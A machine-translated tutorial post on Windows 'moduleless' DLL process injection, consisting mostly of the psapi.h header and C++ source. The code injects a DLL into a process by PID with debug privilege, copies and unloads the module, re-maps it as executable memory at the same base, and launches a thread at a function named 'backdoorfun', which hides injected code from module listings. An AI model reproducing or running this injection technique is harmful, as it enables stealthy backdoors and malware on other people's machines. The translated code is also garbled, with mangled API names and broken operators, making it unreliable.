Analysis of Windows core programming code based on Visual C ++ (63) No module DLL process injection

We often need DLL process injection during information security programming,

How can we implement it in programming.

Need to reference

Psapi. Lib, which can be downloaded by Baidu.

The header file is as follows,

odule Name:    psapi.hAbstract:    Include file for APIs provided by PSAPI.DLLAuthor:    Richard Shupak   [richards]  06-Jan-1994Revision History:--*/#ifndef _PSAPI_H_#define _PSAPI_H_#ifdef __cplusplusextern "C" {#endifBOOLWINAPIEnumProcesses(    DWORD * lpidProcess,    DWORD   cb,    DWORD * cbNeeded    );BOOLWINAPIEnumProcessModules(    HANDLE hProcess,    HMODULE *lphModule,    DWORD cb,    LPDWORD lpcbNeeded    );DWORDWINAPIGetModuleBaseNameA(    HANDLE hProcess,    HMODULE hModule,    LPSTR lpBaseName,    DWORD nSize    );DWORDWINAPIGetModuleBaseNameW(    HANDLE hProcess,    HMODULE hModule,    LPWSTR lpBaseName,    DWORD nSize    );#ifdef UNICODE#define GetModuleBaseName  GetModuleBaseNameW#else#define GetModuleBaseName  GetModuleBaseNameA#endif // !UNICODEDWORDWINAPIGetModuleFileNameExA(    HANDLE hProcess,    HMODULE hModule,    LPSTR lpFilename,    DWORD nSize    );DWORDWINAPIGetModuleFileNameExW(    HANDLE hProcess,    HMODULE hModule,    LPWSTR lpFilename,    DWORD nSize    );#ifdef UNICODE#define GetModuleFileNameEx  GetModuleFileNameExW#else#define GetModuleFileNameEx  GetModuleFileNameExA#endif // !UNICODEtypedef struct _MODULEINFO {    LPVOID lpBaseOfDll;    DWORD SizeOfImage;    LPVOID EntryPoint;} MODULEINFO, *LPMODULEINFO;BOOLWINAPIGetModuleInformation(    HANDLE hProcess,    HMODULE hModule,    LPMODULEINFO lpmodinfo,    DWORD cb    );BOOLWINAPIEmptyWorkingSet(    HANDLE hProcess    );BOOLWINAPIQueryWorkingSet(    HANDLE hProcess,    PVOID pv,    DWORD cb    );BOOLWINAPIInitializeProcessForWsWatch(    HANDLE hProcess    );typedef struct _PSAPI_WS_WATCH_INFORMATION {    LPVOID FaultingPc;    LPVOID FaultingVa;} PSAPI_WS_WATCH_INFORMATION, *PPSAPI_WS_WATCH_INFORMATION;BOOLWINAPIGetWsChanges(    HANDLE hProcess,    PPSAPI_WS_WATCH_INFORMATION lpWatchInfo,    DWORD cb    );DWORDWINAPIGetMappedFileNameW(    HANDLE hProcess,    LPVOID lpv,    LPWSTR lpFilename,    DWORD nSize    );DWORDWINAPIGetMappedFileNameA(    HANDLE hProcess,    LPVOID lpv,    LPSTR lpFilename,    DWORD nSize    );#ifdef UNICODE#define GetMappedFilenameEx  GetMappedFilenameExW#else#define GetMappedFilenameEx  GetMappedFilenameExA#endif // !UNICODEBOOLWINAPIEnumDeviceDrivers(    LPVOID *lpImageBase,    DWORD cb,    LPDWORD lpcbNeeded    );DWORDWINAPIGetDeviceDriverBaseNameA(    LPVOID ImageBase,    LPSTR lpBaseName,    DWORD nSize    );DWORDWINAPIGetDeviceDriverBaseNameW(    LPVOID ImageBase,    LPWSTR lpBaseName,    DWORD nSize    );#ifdef UNICODE#define GetDeviceDriverBaseName  GetDeviceDriverBaseNameW#else#define GetDeviceDriverBaseName  GetDeviceDriverBaseNameA#endif // !UNICODEDWORDWINAPIGetDeviceDriverFileNameA(    LPVOID ImageBase,    LPSTR lpFilename,    DWORD nSize    );DWORDWINAPIGetDeviceDriverFileNameW(    LPVOID ImageBase,    LPWSTR lpFilename,    DWORD nSize    );#ifdef UNICODE#define GetDeviceDriverFileName  GetDeviceDriverFileNameW#else#define GetDeviceDriverFileName  GetDeviceDriverFileNameA#endif // !UNICODE// Structure for GetProcessMemoryInfo()typedef struct _PROCESS_MEMORY_COUNTERS {    DWORD cb;    DWORD PageFaultCount;    DWORD PeakWorkingSetSize;    DWORD WorkingSetSize;    DWORD QuotaPeakPagedPoolUsage;    DWORD QuotaPagedPoolUsage;    DWORD QuotaPeakNonPagedPoolUsage;    DWORD QuotaNonPagedPoolUsage;    DWORD PagefileUsage;    DWORD PeakPagefileUsage;} PROCESS_MEMORY_COUNTERS;typedef PROCESS_MEMORY_COUNTERS *PPROCESS_MEMORY_COUNTERS;BOOLWINAPIGetProcessMemoryInfo(    HANDLE Process,    PPROCESS_MEMORY_COUNTERS ppsmemCounters,    DWORD cb    );#ifdef __cplusplus}#endif#endif

 

See the following code and Analysis for non-module DLL process injection:

# Include "stdafx. H "# include" windows. H "# include" stdio. H "# include" psapi. H "# include" tlhelp32.h "// obtain the information of the loaded DLL module, including the Module Base Address and module size bool getthreadinformation (DWORD processid, char * dllfullname, moduleentry32 & Thread) {handle hthsnapshot = NULL; // gets all the module images of the specified process. hthsnapshot = createconlhelp32snapshot (th32cs_snapmodule, processid); If (hthsnapshot = NULL) return false; // obtain the specified module in the list of all modules. bool bmoremod = mod Ule32first (hthsnapshot, & Thread); If (bmoremod = false) return false; // obtain the desired module cyclically. for (; bmoremod = module32next (hthsnapshot, & Thread) {If (strcmp (thread. szexepath, dllfullname) = 0) break;} If (strcmp (thread. szexepath, dllfullname) = 0) return true; elsereturn false;} // adjust the process permission bool adjustprivileges (handle hprocess, lpctstr lpprivilegename) {//************************************* ******** ******** // Adjust the process permissions //************************ * ***************************** handle htoken; token_privileges tkp; // enable the process permission flag if (!: Openprocesstoken (hprocess, token_adjust_privileges | token_query, & htoken) return false; // pass in the luid value of lpprivilegename if (!: Lookupprivilegevalue (null, lpprivilegename, & tkp. privileges [0]. luid) return false; tkp. privilegecount = 1; tkp. privileges [0]. attributes = se_privilege_enabled; If (!: Adjusttokenprivileges (htoken, false, & tkp, 0, (ptoken_privileges) null, 0) return false; return true;} // inject the DLL part bool injectremoteprocess (handle hprocess, char * dllfullname) {// open up the virtual space to write the complete dll path pstr pdllname = NULL; If (pdllname = (pstr): virtualallocex (hprocess, null, strlen (dllfullname) + 1, mem_commit | mem_reserve, page_execute_readwrite) = NULL) return false; bool writecode; If (writecode =: writeprocessmemory (Hprocess, pdllname, dllfullname, strlen (dllfullname) + 1, null) = 0) return false; // obtain the address of the loadlibrary function in kernel32.dll. export pfnthreadrtn = (callback) getprocaddress (getmodulehandle ("kernel32.dll"), "loadlibrarya"); If (pfnthreadrtn = NULL) return false; // open the remote thread handle hremotethread = NULL; if (hremotethread =: createremotethread (hprocess, null, 0, pfnthreadrtn, pdllname, // loadlibra Ry parameter, that is, the address of the dll path string in the remote process. If multiple parameters are used, the path string is placed in a struct. 0, null) = NULL) return false; return true ;} // uninstall dllbool unistalldll (handle hprocess, byte * address) {// obtain the address of the freelibrary function in kernel32.dll. handle hthread = NULL; export pfnthreadrtn = (pthread_start_routine) getprocaddress (getmodulehandle ("kernel32.dll"), "freelibrary"); If (pfnthreadrtn = NULL) return false; // create a remote thread to execute the freelibrary function. hthread =: Re Ateremotethread (hprocess, null, 0, pfnthreadrtn, address, 0, null); If (hthread = NULL) return false; // wait for the remote thread to terminate.: waitforsingleobject (hthread, infinite); // close the handle.: closehandle (hthread); Return true ;}# define PID 3844 # define backdoorfun 0x1014 // int main (INT argc, char * argv []) {char dllfullname [255]; char dllname [255]; // open the process handle hremoteprocess = NULL; If (hremoteprocess =: OpenProcess (Pro Cess_all_access, false, pid) = NULL) {printf ("OpenProcess faile !! "); Return 0;} bool adjust = adjustprivileges (hremoteprocess, se_debug_name); If (adjust = false) {printf (" Adjust process privileges faile !! \ N "); Return 0;} // obtain the complete dll path strcpy (dllname," DLL. DLL ");: getcurrentdirectory (255, dllfullname); strcat (dllfullname," \ "); strcat (dllfullname, dllname); bool res = extract (hremoteprocess, dllfullname ); if (RES = false) {printf ("inject faile !! \ N "); Return 0;} // wait for the remote thread to start; otherwise, the inserted DLL information cannot be obtained: Sleep (300); DWORD remotetheadaddress = 0; moduleentry32 thread = {sizeof (thread)}; remotetheadaddress = getthreadinformation (PID, dllfullname, thread); If (remotetheadaddress = 0) {printf ("Get remotetheadaddress faile !! \ N "); Return 0;} // allocate and save the buffer after DLL loading, and save char * buffer = new char [thread. modbasesize + 1]; DWORD read;: readprocessmemory (hremoteprocess, thread. modbaseaddr, // The Base Address Buffer of the loaded DLL module, thread. modbasesize, // the size of the loaded DLL Code & read); // uninstall dllbool unstall = unistalldll (hremoteprocess, thread. modbaseaddr); If (unstall = false) {printf ("unistall DLL faile !!! \ N "); Return 0;} // re-allocate the virtual memory. Pay attention to allocating lpvoid alloc from the base address of the original module; alloc =: virtualallocex (hremoteprocess, thread. modbaseaddr, thread. modbasesize, mem_commit | mem_reserve, page_execute_readwrite); If (alloc = NULL) {printf ("virtualallocex failed !! \ N "); Return 0;} bool writer; DWORD written; writer =: writeprocessmemory (hremoteprocess, thread. modbaseaddr, buffer, thread. modbasesize, & written); If (writer = 0) {printf ("writeprocessmemory failed !! \ N "); Return 0;} // restart the function handle hnewthread = NULL in the thread without a DLL module; If (hnewthread =: createremotethread (hremoteprocess, null, 0, (pthread_start_routine) (thread. modbaseaddr + backdoorfun), // The base address of the data added to the process thread. modbaseaddr + dll: the entry point address of the export function is null. // enter the parameter address of the export function here. During the simple period, this export function has no parameters, if any parameter can be written into the process space using the same method in DLL injection, 0, null) = NULL) {printf ("createnewthread faile !! \ N "); Return 0;} return 0 ;}